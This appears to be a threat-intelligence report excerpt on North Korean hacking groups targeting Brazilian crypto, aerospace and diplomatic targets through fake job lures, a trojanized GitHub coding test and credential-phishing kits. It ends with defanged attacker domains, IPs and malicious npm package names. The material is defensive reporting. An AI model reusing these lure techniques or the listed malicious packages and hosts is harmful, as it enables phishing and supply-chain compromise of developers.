- In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
- North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
- One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
- One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.
- https://thehackernews.com/2024/08/north-korean-hackers-target-developers.html
- https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/
- mirotalk[.]net
- ipcheck[.]cloud
- 45[.]61[.]158[.]14
- 167[.]88[.]36[.]13
- 95[.]164[.]17[.]24
- qq-console
- sass-notification
- helmet-validate
- ethersscan-api
- telegram-con
- temp-etherscan-api
- https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/
- https://www.bleepingcomputer.com/news/security/north-korean-hackers-exploit-chrome-zero-day-to-deploy-rootkit/
- voyagorclub[.]space
- https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-7971
- https://nvd.nist.gov/vuln/detail/CVE-2024-4947
- https://nvd.nist.gov/vuln/detail/CVE-2024-5274
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf
- https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf
- https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/